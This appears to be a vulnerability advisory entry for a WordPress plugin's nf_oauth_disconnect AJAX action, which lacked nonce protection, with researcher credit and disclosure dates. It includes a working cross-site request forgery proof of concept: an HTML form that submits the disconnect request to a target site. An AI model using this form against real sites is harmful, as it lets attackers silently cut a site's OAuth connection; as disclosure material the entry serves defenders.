The wp_ajax_nf_oauth_disconnect from the plugin had no nonce protection making it possible for attackers to craft a request to disconnect a site's OAuth connection.
<html> <body> <form action="https://[URL_HERE]/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="nf_oauth_disconnect" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Chloe Chamberland
Chloe Chamberland
Yes
2021-02-16 (about 1 years ago)
2021-02-17 (about 1 years ago)
2021-03-19 (about 1 years ago)